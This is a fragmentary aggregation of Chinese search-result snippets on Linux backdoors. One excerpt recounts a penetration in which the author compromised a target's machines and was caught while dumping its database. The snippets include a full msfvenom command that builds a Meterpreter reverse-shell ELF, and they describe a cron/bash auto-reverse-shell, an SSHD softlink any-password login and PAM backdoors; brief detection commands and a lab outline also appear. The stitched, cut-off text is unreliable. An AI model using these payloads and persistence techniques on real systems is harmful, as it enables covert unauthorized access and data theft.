转载自 https://evilanne.github.io/2017/08/26/Linux后门-持续关注/ 在一次渗透中，成功获取某目标几台比较重要的机器，当时只想着获取脱库，结果动静太大被发现了，之前渗透并没太在意Linux后门，经过此次事后从Google找各种资料，一款满意 ...

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPORT=port -f elf > shell.elf ...

配置文件排查： 　　文件属性：stat /etc/rc.local 　　文件配置：cat /etc/fstab 　　文件内容：grep -V '#' /etc/bashrc | more 　　文件目录：ls -last /etc/profile.d/ cron后门排查： 　　配置文件 ...

Unix Bash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能，保持反弹上线到公网机器。 利用方法 先创建 /etc/xxxx 脚本文件（名字自己改），利用该脚本进行反弹。以下脚本代表全自动反弹到 8.8.8.8 的 53 端口。 nano ...

在一次渗透中，成功获取某目标几台比较重要的机器，当时只想着获取脱库，结果动静太大被发现了，之前渗透并没太在意Linux维持权限，经过此次事后从Google找各种资料，一款满意的rootkit都没有，现在一直在关注这方面，但还是没有找到满意的后门，在渗透圈一个人的资源总是有限往往你全力追求 ...

SSHD软连接后门 软连接后门是sshd启用PAM认证的前提下，利用了一个PAM配置文件将sshd文件生成软连接，把名称设置为su，应用在启动中会去和PAM配置文件夹中寻找是否存在对应名称的配置信息（su）只要pam_rootok模块检测uid是0即可认证成功，这样就导致了可以使用任意密码 ...

首发先知社区: https://xz.aliyun.com/t/7902 前言 渐渐发现pam后门在实战中存在种植繁琐、隐蔽性不强等缺点，这里记录下学习pam后门相关知识和pam后门的拓展改进。 0x01 PAM Backdoor PAM是一种认证模块，PAM可以作为Linux登录验证 ...

一、实验目的 理解后门的定义与分类 掌握后门的操作 学会防范后门 二、实验环境 系统环境：Windows环境，kail环境 软件工具：telnetDoor，weevely 三、实验原理 1. 后门的定义 最早的后门是由系统开发 ...